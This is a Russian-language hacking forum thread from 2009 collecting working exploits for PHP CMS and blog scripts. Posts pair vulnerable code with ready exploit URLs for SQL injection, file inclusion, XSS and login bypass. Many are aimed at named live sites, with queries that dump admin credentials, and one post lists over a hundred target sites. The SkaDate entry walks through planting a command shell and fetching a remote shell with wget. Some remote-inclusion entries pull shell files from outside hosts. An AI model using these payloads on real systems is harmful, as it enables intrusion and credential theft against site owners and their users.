$sym2=array("Q","W","E","R","T","Y","U","I","O","P","A","S","D","F","G","H","J","K","L","Z","X","C","V","B","N","M");
$_GET['type']=str_replace($sym2,$sym,$_GET['type']);
$_GET['use']=str_replace($sym2,$sym,$_GET['use']);
include("block/".$_GET['type']."/".$_GET['use'].".php");
break;
...

/login.php
...
if(($_GET['cmd']!="block")and($_GET['type']!='export')and($_GET['use']!='rss')){
if(isset($_POST['login']) and isset($_POST['password'])){
$_SESSION['login']=$_POST['login'];
$_SESSION['password']=$_POST['password'];
}
if(($_SESSION['login']!=$_auto['login'])or($_SESSION['password']!=$_auto['password'])){
include("form/login.htm");
exit();
}
}
...

exploit:
http://textmaker/?cmd=block&use=rss&type=../sql.txt%00

====================
SQL-injection
magic_quotes = off

/index.php
...
как и при LFI. Но не меняя параметров $_GET['type'] и $_GET['use'] инклудится файл block\export\rss.php
...

/block/export/rss.php
...
if(@$_GET['done']!='yes'){
...
}else{
header("Content-Type: text/xml; charset=utf-8");
$sql3="SELECT * FROM `project` WHERE `id` LIKE '".@$_GET['viewid']."'";
$result1 = $db->sql_query($sql3);
$project=$db->sql_fetchrow($result1);
$sql3="SELECT * FROM `text` WHERE `idproject` LIKE '".@$_GET['viewid']."'";
$result1 = $db->sql_query($sql3);
$num=$db->sql_numrows($result1);
...

exploit:
http://textmaker/index.php?cmd=block&type=export&use=rss&done=yes&viewid=1%27+union+select+1,2,concat_ws(0x20,user() ,database(),version(),@@basedir,@@datadir,@@tmpdir ,@@version_compile_os),4,5,6,7,8,9,10,11+--%20-

в исходнике
<link>root@localhost textmaker 5.0.45-community-nt \usr\local\mysql5\ \usr\local\mysql5\data\ /tmp Win32</link>

Ctacok

08.11.2009, 06:28

Название: Mi-Dia Blog
Автор: Christopher Shaw
Адресс оффициальной странички: http://www.mi-dia.co.uk/

Активная XSS.
В комментариях к записям блога.
javascript:alert()

Ins3t

08.11.2009, 15:47

Doop CMS 1.3.7 LFI

Оффсайт: http://doop.infoauxis.com/
Для загразки почему то доступна только эта версия, предыдущих я не нашел.

Сама CMS достаточно проста, имеет всего навсего один скрипт.

Уязвимый код:

if (!isset($_REQUEST['page'])){
$_REQUEST['page']=$homepage;
$cpage=$_REQUEST['page'];
} else { $cpage=$_REQUEST['page']; }
...
if ($admin == FALSE && !isset($_SESSION['name']) || isset($_REQUEST['preview'])){
if (file_exists("pages/".$cpage.".htm")){
include("pages/".$cpage.".htm");
}
else include("pages/".$cpage.".html");
}

Разработчики хоть и попытались "защититься" с помощю file_exists() и указанием папки, но совершенно забыли о фильтрации передаваемых значений.

Эксплатация:
http://localhost/cmss/index.php?page=../../../../file%00

[x60]unu

08.11.2009, 17:13

Пермь - разработчик datakit
сайт разработчика -http://datakit.ru/
уязвимость - sql injection
table - sys_users (user_login,user_password)
admin panel - http://localhost/admin/logon/index.html
Примеры -
http://www.peugeot-perm.ru/main/index.html?id=192&nid=148/**/and/**/1=2/**/union/**/all/**/select/**/1,concat(user_login,0x3a,user_password),3,4,5,6,7/**/from/**/sys_users
http://www.spass.perm.ru/main/index.html?id=6&nid=88/**/and/**/1=2/**/union/**/all/**/select/**/1,2,concat(user_login,0x3a,user_password),3,4,5,6/**/from/**/sys_users
сайты принадлежащие датакит

12v.perm.ru
303030.ru
59.gibdd.ru
abperm.ru
abs59.ru
arsenal-perm.ru
auto.perm.tv
avocado-perevod.ru
beltprom.ru
bestcreditcard.ru
bestcreditcards.ru
bigbr.ru
black-bar.ru
chusovoy.ru
clubxl.ru
comcars.ru
comedy.perm.ru
crystalltech.ru
datakit.ru
dav-auto.ru
echo.perm.ru
ecotr.ru
edwardsgym.ru
eksformat.ru
empireguru.ru
eng.trophy59.perm.ru
ermak.ru
flashdj.ru
forstroy.ru
gagner.perm.ru
gibdd.perm.ru
globasclub.ru
globassclub.ru
goodwillperm.ru
if-detstvo1.ru
if-zaschita.ru
kgbpro.ru
kislorodclub.ru
komcars.ru
kuzov59.ru
lemax.tv
malmass.ru
mashtab-stroy.ru
mebelpolonii.ru
medpipe.ru
megastarperm.ru
migom.perm.ru
new-ground.ru
nravitso.ru
on-line.perm.ru
online59.ru
pecpl.ru
pnevmatic.ru
portacafe.ru
positiveline.ru
printhall.ru
ptsm.perm.ru
royalfm.ru
shoutaim.ru
skclassic.ru
spk-nhs.ru
staratovich.ru
stfc.ru
stolica-perm.ru
swedengroup.ru
syava.net
taan.ru
timontii.ru
timontii.shoutaim.ru
toyota-verratmn.ru
toyota59.ru
uitc.ru
vektor.perm.ru
verra-tyumen.ru
vs01.datakit.ru
www.abs59.ru
www.alexiy.ru
www.armsbp.ru
www.audit-kontrakt.ru
www.bionica-club.ru
www.bionicaclub.com
www.clubxl.ru
www.crazylove.perm.ru
www.dav-auto.ru
www.dveregrad.ru
www.edwardsgym.ru
www.ekskargo.ru
www.en.skclassic.ru
www.ermak.ru
www.gsi-pngs.ru
www.honda59.ru
www.new-ground.ru
www.nissan-tmn.ru
www.on-line.perm.ru
www.permdomo.ru
www.peugeot-perm.ru
www.plazaolympia.ru
www.portacafe.ru
www.shoutaim.ru
www.spass.perm.ru
www.tk.perm.ru
www.toyota59.ru
www.trophy59.perm.ru
www.ural-venture.ru
www.vektor.perm.ru
zurs.ru
(c) x60unu

warlok

08.11.2009, 23:40

Программа: Quon Database Management
Описание: недостаточная фильтрация входяших данных, sql injection & xss
Уязвимый код:
moviepage.php

$query = "SELECT * FROM movie WHERE id=" . $_GET['id'];
$result = @mysql_query($query);

exploit: www.example.com/moviepage.php?id=1+union+select+1,2,3,4,5,concat_w s(0x3a,email,password,admin),7,8+from+users
barcode.php

$query = "SELECT * FROM movie WHERE id=" . $_GET['id'];
$result = @mysql_query($query);
$row = @mysql_fetch_array($result);

exploit: www.example.com/barcode.php?id=-1+union+select+email,2,password,4,5,6,7,8+from+use rs
checkin.php

<INPUT TYPE="text" name="check" id="check" value="<?php echo $getid;?>">

exploit:www.example.com/checkout.php?id=1%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
exploit:www.example.com/checkin.php?id=xss%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E
©trumpcode.org

Ins3t

09.11.2009, 01:23

Ananta_Gazelle 1.0

Раскрытие путей

http://localhost/anata/search.php?lookup[]=ololo

Pasive XSS

Уязвимый код:

$pagetitle = "Search";
$lookup = "";
if (isset($_GET) && isset($_GET["lookup"]) && $_GET["lookup"]) {
$pagetitle .= " for ".$_GET["lookup"];
$lookup = $_GET["lookup"];
} else {
$lookup = "";
}

Как видно, передаваемый GET'ом парамерт lookup не
фифильтруется.

Эксплатация:

http://localhost/anata/search.php?lookup="><script>alert()</script>

Вторая пасивная XSS в скрипте user.php

Уязвимый код:

if (isset($_GET) && isset($_GET["user"]) && $_GET["user"]) {
$pagetitle .= " for ".$_GET["user"];
}

Та же картина.

Эксплатация:

http://localhost/anata/user.php?user="><script>alert()</script>

Но от XSS'ок толку нету, так как движок не работает с куками :D

Так что это с чисто познавательной целью.

P.S: там еще есть что то пожожее на инъекцию в insert запросе, но сейчас времени мало. Если выжму с не что то - выложу ;)

Ctacok

09.11.2009, 07:42

AdaptBB
Версия: Последняя.

Активная XSS

/profile/
Avatar меняем на javascript:alert()

Ins3t

09.11.2009, 12:03

CMS Faethon v 2.0.4 SQL injection && Active XSS
Вreetz: Red_red1 && ElteRUS
Скрипт autor.php

Уязвимый код:

...
elseif(isset($_GET['name']))
{
$result=sql_query("SELECT id, name FROM ".$SQL_PREFIX."_authors WHERE item = '" . $_GET['name'] . "';");
}
...

Передаваемый GET'ом параметр name не фильтруеться.

Эксплатация:

http://localhost/bug/author.php?name=vasua'/**/and/**/substring(version(),1,1)=5/**/and/**/'1'='1

скритп info.php

$result=sql_query("SELECT title, text FROM ".$SQL_PREFIX."_html_sections WHERE address = '" . $_GET['item'] . "';");

Эксплатация:

http://localhost/bug/info.php?item=-1'[SQL]

XSS:

Уязвимый код:

...
$author = $_POST['author'];
$email = $_POST['email'];
$web = $_POST['web'];
$subject = $_POST['subject'];
...

Эксплатация:
В комментах:
"><script>alert()</script>

nikp

09.11.2009, 18:43

SkaDate social networking software

http://com.skadate.com
dork: "SkaDate social networking software" filetype:php

Уязвим параметр language_id=[LFI], запоминается в куках.

/inc/class.language.php
function Language()
{
if( $_GET['language_id'] )
{
$this->curr_lang_id = $_GET['language_id'];
setcookie( 'language_id', $_COOKIE['language_id'], time()-1, PATH_HOME );
setcookie( 'language_id', $_GET['language_id'], time()+2592000, PATH_HOME );
}
elseif( $_COOKIE['language_id'] )
{
$this->curr_lang_id = $_COOKIE['language_id'];
}
else
{
$this->curr_lang_id = getConfig( 'def_lang_id' );
}

Находим инклуд
http://www.exoticity.net/privacy.php?language_id=../../../../../../etc/passwd%00

Смотрим куки, интересует параметр skadate_sessid, видим md5, к примеру 08fc79f504eb70c4c6b769e62831f494.

Ищем сессию в /tmp/.
http://www.exoticity.net/privacy.php?language_id=../../../../../../tmp/sess_08fc79f504eb70c4c6b769e62831f494%00
Если не угадали, находим php.ini и смотрим, куда сохраняется сессия, аналогично инклудим ее.

Теперь сессия запомнилась в куках и инклудится на экран.

Льем минишелл в сессию
http://www.exoticity.net/member/online_list.php?pg=<?if($_GET[pass])system($_GET[pass]);?>

Выполняем команду и льем минишелл для следующей команды
http://www.exoticity.net/member/sign_in.php?pg=<?if($_GET[pass])system($_GET[pass]);?>&pass=ls .. -lia;id

Открываем исходный код странички (форматирование не нарушено), видим наши права в системе, доступные на запись каталоги.
Абсолютный путь тоже виден, льем шелл.

http://www.exoticity.net/member/sign_in.php?pg=<?if($_GET[pass])system($_GET[pass]);?>&&pass=wget http://site/shell.txt -O /home/exoticit/public_html/images/shell.php

=======
Примеры: http://forum.antichat.ru/showpost.php?p=1595768&postcount=990

[x60]unu

09.11.2009, 20:21

PHP-Fusion
Bug:SQL inkection

Exploit:
http://site.com/[path]/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,user_name,4,5,6,7 +from+security_users--

http://recipe.jones-net.com/index.php?m=recipes&a=search&search=yes&course_id=5+union+all+select+1,2,user_name,4,5,6,7 +from+security_users--

выводит в Comments

HAXTA4OK

10.11.2009, 00:38

The DBS, v0.8.0.0 beta r1.

Файл comment.php

$pid = $_GET['pid'];
$hLevel = 0;
}

// Run security checks on the post we are commenting on, to make sure we are allowed to comment on it
$EntryQuery = "SELECT * FROM posts WHERE `pid` = $pid";

http://localhost/dbs/comment.php?pid=-1+union+select+1,version(),3,4,5,6,7,8,9--

Ctacok

10.11.2009, 07:48

Название: Gravity Board X
Офф. сайт: http://www.gravityboardx.com
Версия: 2.0 BETA (Public Release 3)

Активная XSS.
/index.php?action=newpm
В поле Message(Сообщение).
<script>alert();</script>
И отправляем.

/index.php?action=postnew&board_id=[Номер категории]
Имя: Bla
Message: <script>alert();</script>

Пассивная XSS

/index.php?action=viewthread&thread_id="><script>alert()</script>

From RoA with love ;)

[x60]unu

10.11.2009, 14:57

idesk

Bug - SQL injection
Exploit:
/**/and/**/1=2%20/**/union/**/all/**/select/**/1,2,3,version(),4,5,6,7,8--
or
1+UNION+SELECT+0,0,0,@@VERSION,0,0,0,0,0--

Пример на сайте разработчика)))

http://www.nicecoder.com/support/download.php?cat_id=1/**/and/**/1=2%20/**/union/**/all/**/select/**/1,2,3,version(),4,5,6,7,8/*

Дополнение от меня (автором данной баги не была указана такая информация ---

idesk - table
таблица idesk_user ((user_name, password)
пример

сайт разработчика -
http://idesk.ranacorp.com/download.php?cat_id=1+UNION+SELECT+0,0,0,concat_ws (0x3a,user_name,password,last_login),0,0,0,0,0+fro m+idesk_user--

nikp

10.11.2009, 18:40

Simple PHP Agenda
http://sourceforge.net/projects/php-agenda/
SQL

edit_event.php
if (isset ($_GET["eventid"])) {
$eventid = mysql_real_escape_string($_GET["eventid"]);
/* Get activity information */
if ($singleAgenda)
$sql = "select * from events where id=$eventid";
else
$sql = "select * from events where id=$eventid and user_id=" . $session->id;

http://localhost/php-agenda-2.2.7/edit_event.php?eventid=-1+union+select+1,2,3,version(),user(),6,7,8,9--

Ctacok

11.11.2009, 07:27

KubeBlog

Раскрытие путей.
/post.php?i[]=1
content.php?i[]=1
?m=11&y[]=2009
?m[]=11&y=2009

Пассивная XSS

/login.php?ref=%22%3E%3Cscript%3Ealert();%3C/script%3E

nikp

11.11.2009, 20:14

The Rat CMS
http://downloads.sourceforge.net/the-rat-cms

обход авторизации

login.php

$userId = $_POST['txtUserId'];
$password = $_POST['txtPassword'];

// check if the user id and password combination exist in database
$sql = "SELECT user_id
FROM tbl_auth_user
WHERE user_id = '$userId' AND user_password = PASSWORD('$password')";

$result = mysql_query($sql) or die('Query failed. ' . mysql_error());

if (mysql_num_rows($result) == 1) {
// the user id and password match,
// set the session
$_SESSION['db_is_logged_in'] = true;

// after login we move to the main page
header('Location: main.php');
exit;
} else {
$errorMessage = 'Sorry, wrong user id / password';
}

User Id : 1' or 1=1 limit 0,1 --
Password : any

SQL, XSS

http://www.opennet.ru/base/netsoft/1214498363_15515.txt.html

Ins3t

12.11.2009, 01:17

IF CMS version 2.0.7 SQL injection

Уязвимость хранится в скрипте frame.php:

...
$id = $_GET['id'];
...

...
$result = $dbi->sql_query("SELECT ban_trgt FROM ".$table->get('banner')." WHERE id_ban='$id'");
...

Реализация:

localhost/ifcms/frame.php?id=[SQL]

Для успешной реализации требуется magic_quotes = OFF.
oRB, благодарю за доолнение.

Ins3t

12.11.2009, 23:35

Elusive CMS SQL injection

Уязвим скрипт download.php

...
$query = "SELECT * FROM incomming where id='$id'";
$result = mysql_query($query) or die("Query failed");
...

Реализация:

localhost/download.php?id=[SQL]

Для успешной реализации - magic_quotes_gpc = off

[x60]unu

13.11.2009, 00:15

Model Agency Manager PRO

Bug : Sql Injection
view.php?user_id=[SQL]
Exploit :
1/**/and/**/1=0%20/**/union/**/all/**/select/**/concat_ws(char(42,42,42),version(),database(),user ()),0,0,0/*
or
1%20union%20select%20user(),2,3,4/*

site:
http://www.fashionpage.com/view.php?user_id=408/**/and/**/1=0%20/**/union/**/all/**/select/**/concat_ws(char(42,42,42),version(),database(),user ()),0,0,0/*&view=photos

Ins3t

13.11.2009, 04:09

webSPELL CMS v4.0 Blind SQL injection

Уязвимость затаилась в скрипте профиля (profile.php):

...
if($_GET['id']) {
$id = strip_tags($_GET['id']);

//profil: buddys
if($_GET['action'] == "buddys") {

eval ("\$title_profile = \"".gettemplate("title_profile")."\";");
echo $title_profile;

$buddys=safe_query("SELECT buddy FROM ".PREFIX."buddys WHERE userID='$id'");
...

Единственной попыткой защитить свое "детище" программисты сделали фильтрацию пережаваемого ГОТом значния с помощю функции strip_tags(), которая как известно удаляет HTML и PHP теги из строки.

Реализация:

http://localhost/1/index.php?site=profile&id=1'+and+substring(version(),1,1)=5+and+'1'='1

http://localhost/1/index.php?site=profile&id=1'+and+ascii(lower(substring(user(),1,1)))=114+ and+'1'='1

http://localhost/1/index.php?site=profile&id=1'+and+ascii(lower(substring(user(),2,1)))=111+ and+'1'='1

И так далее.

Для удачной эксплаьации magic_quotes_gpc должно быть в положении off

Ins3t

13.11.2009, 18:35

ShareCMS_0.1 Beta

CMS просто ужасная, сплошная SQL инъекция.
Уязвимы практически все скрипты.

Возьмем к примеру tortf.php:

...
$id = $_GET['id'];
$sql = mysql_query("SELECT admin FROM menu WHERE id = '$id'");
$row = mysql_fetch_array($sql);
...

По просьбам трудящихся - удобная для юзера реализация:

http://localhost/8/plugins/tortf.php?id=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1--+

Требуется mq = off

СMS с возможностью реализации при mq = on ждите позже.

nikp

13.11.2009, 19:40

http://www.cita.illinois.edu/
демонстрация ARIA (Accessible Rich Internet Applications)
RFI

source_inline.php
$tpl = & new Template('../view/outer-inline-source.tpl');
...
echo $tpl->fetch();

/view/outer-inline-source.tpl
$ginc = $_GET['ginc'];
...
if (preg_match ("/^\//", $ginc) || preg_match ("/\.\./", $ginc))
$ginc = "";
....

include $ginc;

http://test.cita.uiuc.edu/aria/alert/view_inline.php?ginc=http://site.com/shell.txt

m0Hze

14.11.2009, 04:52

Product: Z-BreakNews v0.1
Далее судьба автора неизвестна.

Думал нигде не встречу этой лабуды,но раз встретилось,напишу.

file: single.php

...
$row=mysql_fetch_array(mysql_query("SELECT * FROM news WHERE id=".$_GET['id']));
...

target: single.php?id=1+union+select+1,2,3,4+--+4

file:insert.php

...
if (($img1_type == $cert1) or ($img1_type == $cert2) or ($img1_type == $cert3))
...

target: Меняем mime-type в заголовках,заливаем шелл.

В довесок скажу, что никто не просит удалять install.php.

m0Hze

14.11.2009, 05:03

Product: 3MeMoS-phpNews
Version: 1.1

file: post_news_process.php

...
$query = "INSERT INTO news(title, news, author, date)
VALUES('".$_POST['title']."','".$_POST['news']."','".$_POST['author']."', now())";
...

target: Подменяем $_POST['news'] or $_POST['title'] or $_POST['author'] на необходимый sql-inj запрос.Так как тут insertдело может немножно осложниться.

nikp

14.11.2009, 12:50

mypage0.4
http://qgotchi.sourceforge.net/index.php
LFI

index.php
if(isset($_GET['page'])){
...
$inhalt=$inhaltsordner."/".$_GET['page'];}
...
$inhalt=str_replace("///","",$inhalt);
if (FALSE==include$inhalt){echo$notfound;}

http://qgotchi.sourceforge.net/index.php?page=../../../../../../../../etc/passwd

nikp

14.11.2009, 13:30

c Copyright 2007 - 2009 ..:: Exclusiva Limpeza Comercial Industrial LTDA ::..
http://www.exclusivalimpeza.com.br
allow_url_include = Off LFI
allow_url_include = On RFI

index.php
if($incl=="")
include "meio.php";
else
include "${incl}.php";

magic_quotes_gpc = Off
http://www.exclusivalimpeza.com.br/index.php?incl=../../../../../../../../etc/passwd%00

m0Hze

14.11.2009, 16:25

Product: Новости 0.1а
Version: 0.1а
Author: jamper@ukr.net

file: comments.php

string 9: $id = $_GET['id'];
...
string 11: $query = "SELECT * FROM news WHERE id=$id";
...
string 28: $query = "SELECT * FROM news_comments WHERE id_news=$id";
...

target: comments.php?id={SQL-inj}

file: edit.php

....
$news = $_GET['news'];
$id = $_GET['id'];
$id2 = $_GET['id2'];

if($news!="")
{
$query = "UPDATE news SET news='$news' WHERE id=$id2";
$result = mysql_query ($query);
}
....
if($id>0)
{
$query = "SELECT * FROM news WHERE id=$id";
$result = mysql_query($query);

target: edit.php?id2={SQL-inj} or edit.php?id={SQL-inj}

//Незнаю кто автор этого чуда,но в каталоге сриптов он есть oO

nikp

14.11.2009, 22:55

TheContactBook.v.beta.3.2
http://sourceforge.net/projects/thecontactbook/files/TheContactBook.v.beta.3.2.zip/download
SQL

popup.php
$id = $_GET["id"];

TableManipulation.class.php
private function getContact($id) {
$SQL = "SELECT * FROM "._MYSQLTABLE_." WHERE "._PKEY_."=$id";
$result = $this->db->query($SQL);
if ($result->countRows()>0) { return $result->fetchRow(); }

http://localhost/TheContactBook.v.beta.3.2/TheContactBook/popup.php?status=details&id=-5+union+select+user(),version(),3,4,5,6,7,8,9,10,1 1+--+

m0Hze

15.11.2009, 01:11

Product: SuLogu
Author: unnamed
Version: 0.6.2

LFI

file: comments.php

...
if (!$language) {
// try to set the user's preferred language from a previous cookie
if ($_COOKIE['bloglang']) {
$language = $_COOKIE['bloglang'];
} else {
$language = $defaultlanguage;
setcookie("bloglang", $defaultlanguage);
}
} else { // language must exists among defined tags
if (!languageexists($language)) {
$language = $defaultlanguage;
setcookie("bloglang", $defaultlanguage);
}
}

// Include corresponding language file.
include("language/" . $language . ".php");
...

target: Отправляем поддельный запрос на сервер,и подставляем в COOKIES: bloglang={LFI}'%00; За пределы директории у меня не вышел,возможно вам повезет больше (:

Также там множество SQL-inj, но разработчики просто удивляют нас,тем что расчитывают,что везде будет включено registers_global.
Например:

file: index.php

...
function imagenavmenu($id, $page) {
global $showall, $language;

$res = mysql_query("SELECT id FROM blogimages WHERE id < " . $id . " ORDER BY id DESC LIMIT 1");
...

Но $id нигде не будет объявляться,так что скрипт,как и SQL-inj убдет работать только на registers_global = on;
?id=-1+union+select+1,2,3,4,version(),6,7/*

Ins3t

15.11.2009, 01:18

EasyNEWS SQL injection

easynews.php:

...
if (isset($_GET['id'])) {
$id = $_GET['id'];
$query = 'SELECT * FROM `'.$table_name.'` WHERE newstime='.$id.'';
...

Эксплаьация:

http://localhost/10/easynews.php?id=1+union+select+1,version(),3,4,5,6--+

m0Hze

15.11.2009, 01:40

Product: pHpAS (Article System)
Author: unnamed
Version: 1.12

SQL

file: show.php

...
f(isset($_GET['id'])) {
$sql = "SELECT * FROM arts WHERE id=".$_GET['id'];
$resultaat = mysql_query($sql);
...

target: show.php?id=-1+union+select+1,2,version(),4/*

file: show_comments.php

if(isset($_GET['nr'])) {
$sql = "SELECT * FROM comments WHERE nr=".$_GET['nr'];
$resultaat = mysql_query($sql);

target: show_comments.php?nr=-1+union+select+1,2,3,4,version(),6/*

file: comments_all.php

$sql = "SELECT * FROM comments WHERE id=".$HTTP_GET_VARS['id']."";
/* Тут писатель совсем разленился,даже проверок нет :( */

target: comments_all.php?id=-1+union+select+1,version(),3,4,5,6/*

XSS

file: show.php

...
if (mysql_num_rows($resultaat) >0) {
..
else{
echo 'geen resultaten gevonden voor id='.$_GET['id'];
...

target: show.php?id="><XSS>

file: show_comments.php

if (mysql_num_rows($resultaat) >0) {
...
}
else{
echo 'geen resultaten gevonden voor id='.$_GET['id'];

target: show_comments.php?nr="><XSS>

m0Hze

15.11.2009, 01:42

А где он в том коде, что ты выложил должен объявляться?
function imagenavmenu($id <------- Вот это, разве не объявление переменной в функции???, $page)
М.б. стоит показать как идёт обращение к функции, может там так:
imagenavmenu($_GET[id] $_GET[page])?
Ты меня совсем не понял, непосредственно в движке,нет вообще обращени к $_GET,$_POST,$_HTTP_VARS.Все расчитано на register_globals = on, во всяком случае тот что у меня.
2jokester, извини что не выкладываю вместе со столбцами.Я не устанавливаю движки на свой компьютер,смотрю непосредственно в блокноте.
Завтра все поправлю.Это же из каталога скриптов ^_^
/addдобавил полный код лфи sulog, забыл строчку с инклудом.

Ins3t

15.11.2009, 04:15

Minibill CMS 1.2.5

SQL INJECTION:

...
if ($_GET['order_id'])
{
$Q="SELECT * FROM orders WHERE order_id='$_GET[order_id]' AND user_id='$_SESSION[id]' LIMIT 1";
$preOrder = mysql_fetch_assoc(mysql_query($Q));
...

Реализация:

http://localhost/13/pages/orderform.php?order_id=[SQL]

Версия:

http://localhost/13/CHANGELOG

Установочный SQL дамп:

Так же можно найти установочный дамп БД с имнами таблиц и колонок (если его админ не потер или не выставил права):

http://localhost/13/sql/minibill.sql

RFI:

...
include($config['include_dir']."dbConnect.php");
...

http://localhost/13/crontab/run_invoicing.php?config[include_dir]=http://google.com%00

Ctacok

15.11.2009, 21:35

Название: MigasCMS
Версия: 1.0

Залитие шелла.
Нужны права администратора.
/cms/admin/webadmin.php
Отсутствует проверка на формат файла.

Раскрытие путей
/cms/index.php?mode=view&recid[]=
/cms/index.php?mode[]=

AFoST

15.11.2009, 22:57

Ins3t

16.11.2009, 01:13

PHPNS version 2.2.4 BLIND SQL INJECTION

Уязвимый скрипт manage.php:

...
while ($item_row = mysql_fetch_array($item_list)) { //for each item in db
//convert timestamp to readable/human date
$item_row['timestamp'] = date($globalvars['time_format'],$item_row['timestamp']);
$item_row['article_cat_name'] = gen_cat_name($item_row['article_cat']); //switch cat_id to readable name
$row_bg = ($row_bg == $globalvars['altcolor'][2]) ? $globalvars['altcolor'][1] : $globalvars['altcolor'][2]; //current row bg

//switch active column to yes, draft, or unapproved.
if ($item_row['active'] == 1) { $item_row['active'] = '<span class="positive">Yes</span>'; } elseif ($item_row['active'] == 0) { $item_row['active'] = '<span class="negative">Draft</span>'; }
if ($item_row['approved'] == 0) { $item_row['active'] = '<span class="negative">Unapproved</span>'; }

$item_row['comments'] = mysql_num_rows(general_query('SELECT * FROM '.$databaseinfo['prefix'].'comments WHERE article_id="'.$item_row['id'].'"'));

if (strlen($item_row['article_title']) > 30) {
$item_row['article_title'] = wordwrap($item_row['article_title'], 30, "<br />");
}

//generate the actual html rows
$table_rows = $table_rows.'<tr bgcolor="'.$row_bg.'">
<td>
<a href="article.php?id='.$item_row['id'].'&do=edit"><img src="images/icons/edit.png" class="row_icon" alt="edit icon" title="edit "'.$item_row['article_title'].'"" /></a>
<a href="article.php?id='.$item_row['id'].'&do=edit" title="edit "'.$item_row['article_title'].'""><strong>'.$item_row['article_title'].'</strong></a>
</td>
<td><a href="manage.php?v='.$item_row['article_cat'].'">'.$item_row['article_cat_name'].'</a></td>
<td>'.$item_row['timestamp'].'</td>
<td><a href="manage.php?v='.$item_row['article_author'].'">'.$item_row['article_author'].'</a></td>
<td align="center"><a href="article.php?do=comments&id='.$item_row['id'].'">'.$item_row['comments'].'</a></td>
<td align="center">'.$item_row['active'].'</td>
<td class="checkbox"><input type="checkbox" value="'.$item_row['id'].'" name="'.$item_row['id'].'"></td></tr>';
} //end of each item in db generation
...

Реализация:

http://localhost/15/manage.php?v=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1--+

Таблица с юзерами: phpns_users

Для успешной реализации - magic_quotes_gpc = off

Shaitan-Devil

16.11.2009, 17:48

Copyright © 2005
Программное обеспечение - BORNET.ru

sql-inj
http://www.evruka.ru/show_cat2.php?grid=-1%27+union+select+1,2,3,4,5,6,7,8,9,10,11+--%20-

в админку без пароля:
admin' or true -- -
example:
http://www.evruka.ru/admin/
Я, конечно, дико извиняюсь, но выложил до этого http://forum.antichat.net/showthread.php?p=1194275#post1194275
НУ и еще......
WebGrand CMS 2.0 © 2003

http://www.la-primavera.org/admin/

Эксплуатация.

' or 1=1--

Недостаточная фильтрация.
(c)

Ins3t

16.11.2009, 21:08

[ Cerulean Portal System version 0.7 LFI ]

Уязвимый код portal.php:

...
include ($phpbb_root_path . 'portal/config.' . $phpEx);
...

Реализация:

http://localhost/18/portal.php?phpEx=./../../file.php

Требования: register_globals = ON

Так же там есть RFI, но его я не выкладываю, так как его нашли ранше меня и уже опубликовали :(

nikp

16.11.2009, 21:16

Inspirado (blog engine)
Released 02/02/2009
http://inspirado.sourceforge.net/

LFI

themes/k2/block.php
themes/vistacolors/block.php
<?php include "./blocks/".$blog_blockfile ?>
http://localhost/inspirado_1/themes/k2/block.php?blog_blockfile=../../../../../../../../etc/passwd

SQL

admin/index.php
include "./structure/theme.php";
admin/structure/theme.php
<?php include "./modules.php"; ?>
admin/modules.php
case "editlink":
include "./structure/editlink.php";
admin/structure/editlink.php
$linkInfo=getLinkInfo($_GET["id"])
admin/lib/functions.php
function getLinkInfo ($id) {
$link = dbQuery("SELECT * FROM ".DBPREFIX."headlinks WHERE id=".$id);
$link = mysql_fetch_array($link,MYSQL_ASSOC);

return $link;
http://localhost/inspirado_1/admin/index.php?m=editlink&id=-1+union+select+1,2,version(),user(),5

шелл льется из админки

Administration Panel => Widgets => Create PHP block

искать в
http://localhost/inspirado_1/blocks/shell.php

Ins3t

16.11.2009, 22:37

Lanius CMS version 0.5.2 RFI

Требования: register_globals= ON
allow_url_include = ON

Уязвимый код index.php:

...
require 'core.php';
include $d_root.'includes/header.php';
...

Смотрим в core.php:

...
if (!file_exists( $d_root.$d_private.'config.php' )) {
header( "Location: install/index.php" );
exit();
}
...

Эксплатация:

http://localhost/11/index.php?d_root=ftp://login:pass@host/script.php%00

Ins3t

17.11.2009, 10:14

ADN-FORUM version 0.1b Blind Sql INJECTION

crear.php:

...
$result = mysql_query("SELECT anonimos FROM ".$prefijo."_foros where id='$fid'",$conexion);
$row = mysql_fetch_row($result);
if(!isset($fpusuario) && $row[0]==0){echo"<br><br><center>"._CREARMSG2."<br><br><br><br><a href=\"index.php?fid=$fid\"><img src=\"img/$lenguaje/aceptar.gif\" border=0 align=absmiddle></a></center>";}
...

Реализация:

http://localhost/19/crear.php?fid=1'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1--+

mq=off

Bb0y

17.11.2009, 23:57

BMForum 5.6
Активная xss:

/messenger.php?job=write
в модуле личных сообщений.
В поле "Содержание" пишем: "><script>alert()</script> и отправляем.
Активная xss:

/post.php?forumid=[number_forum]
при создании нового Топика.
В поле "Заголовок" пишем: "><script>alert()</script> и добавляем. Так же работает в поле "Описание".
Активная xss:

/profile.php
в Профиле. В полях:
-Номер MSN
-Подпись
-Домашняя страница
-Информация о себе
пишем "><script>alert()</script>. Будет видно при просмотре Тем с вашими сообщениями и у вас в профиле.
Пассивная xss:

http://localhost/plugins.php?p=tags&jinhua=&listby=&tagname=[tag]&forumid=[id]&page=%22%3E%3Cscript%3Ealert()%3C/script%3E
Так же в наличии несколько sql - инъекций, но на форуме их уже выкладывали.

Ctacok

18.11.2009, 18:26

PHPMySpace Gold Edition 8.0
From ROA with Love ;)

Пассивная XSS
/modules/ecal/display.php?day=1&month=11&year=<script>alert();</script>
/modules/memberslist/index.php?letter=All&sortby=name&orderby=ASC&query='><script>alert();</script>

Раскрытие путей
/modules/xtremuserguestbook/sign.php?gbid[]=1
/modules/ecal/display.php?day=1&month[]=11

Ctacok

18.11.2009, 21:53

2z Project

Активная XSS
В комментариях к новости:

Раскрытие путей
/?action=search&author=&catid=0&postdate=&search[]=12

nikp

19.11.2009, 16:14

